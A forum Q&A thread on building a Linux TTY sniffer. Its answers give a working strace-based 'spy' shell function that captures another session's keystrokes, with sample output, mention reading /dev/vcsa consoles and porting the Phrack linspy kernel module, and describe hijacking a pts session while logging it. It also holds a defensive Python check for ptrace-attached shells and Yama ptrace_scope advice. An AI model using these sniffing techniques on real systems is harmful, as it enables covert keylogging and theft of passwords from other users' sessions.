
How would I go about writing a Linux TTY sniffer?

For educational purposes (not that anyone should care about the motivations behind such an exercise) I'd like to write a program that can read/write to/from alternate ttys/ptys. I've read papers (from the 1990s) but can't employ the implementation they use on modern Linux/glibc.

I was hoping that someone had researched into this in the past (not too far in the past), or at least, read documentation pertaining to it, that they could provide, that would enlighten me further.

I also wonder (considering the fact that Linux doesn't have streams) if this exercise must be done via a loadable kernel module [lkm].

I have many questions and probably a misunderstanding of some of the fundamental ideologies that allow such objectives to be put in place. Could someone help? :)

function spy() {
    ptsnum=`ps awfux | grep pt[s]\/"$1" | awk '/bas[h]/{print $2}'` ;
    /usr/bin/strace -s 1000 -t -f -p $ptsnum 2>&1 3>&1 \
    | grep -Poi 'write(...\"[[:print:]]{1,2}\"[.][.][.][,]..)' ;
}

[436] klikevil@epiphany ~ $ w
 09:36:43 up 12:06,  6 users,  load average: 0.46, 0.29, 0.20
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
klikevil pts/0    75.125.126.8     23:05    2:19m 10:33   0.18s cmd
klikevil pts/1    75.125.126.8     00:18    6:50m  0.06s  0.04s sshd: klikevil [priv]
klikevil tty7     :0               09:02   17:07m  2:02   0.32s x-session-manager
klikevil pts/2    :0.0             09:03    3:30   0.08s  0.08s bash
klikevil pts/3    :0.0             09:03    0.00s  0.76s  0.00s w
klikevil pts/4    :0.0             09:06    3:13   0.46s  0.00s /bin/sh /usr/bin/thunder

[437] klikevil@epiphany ~ $ spy 2
write(2, "e"..., 1)
write(2, "c"..., 1)

write(2, "h"..., 1)
write(2, "o"..., 1)
write(2, " "..., 1)
write(2, "s"..., 1)
write(2, "u"..., 1)
write(2, "p"..., 1)
write(2, " "..., 1)
write(2, "d"..., 1)
write(2, "o"..., 1)

write(2, "g"..., 1)
write(2, "\n"..., 1)
^C

Seems to work pretty well if you don't mind sorting through a bunch of line breaks. As for the TTYs... tail -f /dev/vcsa1-6

Jessica
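The strace trick above works by ptrace-attaching to the victim's bash, and the kernel records that attachment: the traced process's /proc/<pid>/status carries a non-zero TracerPid for as long as strace is attached. The following detection check is an added example, not code from any answer here; it assumes the Linux procfs layout and uses a constructed status file as sample input.

```python
"""Added defender-side check, not from any answer on this page. Assumes the
Linux procfs layout (/proc/<pid>/status); the sample below is constructed."""
import os

STATUS_FIELDS = ("Name", "Pid", "TracerPid")

# Constructed sample of /proc/<pid>/status for a shell that strace -p has
# attached to; on a real host the text comes from procfs via live_statuses().
SAMPLE_TRACED_STATUS = (
    "Name:\tbash\nState:\tt (tracing stop)\nPid:\t4242\nPPid:\t4200\n"
    "TracerPid:\t5151\nUid:\t1000\t1000\t1000\t1000\n"
)

def parse_status(text):
    """Reduce a status file to the fields the check needs."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key in STATUS_FIELDS:
            fields[key] = value.strip()
    return fields

def traced_processes(statuses):
    """Return (pid, name, tracer_pid) for each status whose TracerPid is
    non-zero, i.e. a process that some other process is ptrace-attached to."""
    hits = []
    for text in statuses:
        f = parse_status(text)
        if f.get("TracerPid", "0") != "0":
            hits.append((int(f["Pid"]), f["Name"], int(f["TracerPid"])))
    return hits

def live_statuses(proc="/proc"):
    """Yield the status text of every process visible in procfs."""
    for entry in os.listdir(proc):
        if entry.isdigit():
            try:
                with open(os.path.join(proc, entry, "status")) as fh:
                    yield fh.read()
            except OSError:  # raced with process exit, or a hidepid mount
                continue

if __name__ == "__main__":
    print(traced_processes([SAMPLE_TRACED_STATUS]))  # [(4242, 'bash', 5151)]
    for pid, name, tracer in traced_processes(live_statuses()):
        print(f"pid {pid} ({name}) is traced by pid {tracer}")
```

Debuggers and legitimate profilers show up the same way, so treat a hit on an interactive shell as the signal, not any tracer at all. Yama's kernel.yama.ptrace_scope set to 1 or higher also prevents an unprivileged user from attaching to a process they did not spawn, which is the prerequisite for the spy function.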

The linspy.c code in that Phrack article is a Linux kernel module. It won't compile against a modern kernel, because the internal kernel interfaces change frequently.

However, the basic approach it uses is sound (although it is completely missing locking required for correctness in an SMP environment), and with the application of sufficient elbow grease you should be able to port it to compile against the latest kernel.

I'm ssh'd into a remote Linux box twice, producing /dev/pts/0 and /dev/pts/1. From 0, I can open 1 for read, thereby stealing all the stuff the user types to 1. If I want them to see their typing, I have to write it back to /dev/pts/1. Of course, their input never makes it to their shell, so I have to create a shell process at my end (on 0) and pipe their input to it, then pipe the shell's output back to 1.

This all works great for me. While all this is going on, I can save off all the data read and written during the process wherever I like.

Of course, you can't do this unless you are root or are snooping on a session you own, but you only wanted this for educational purposes, right?
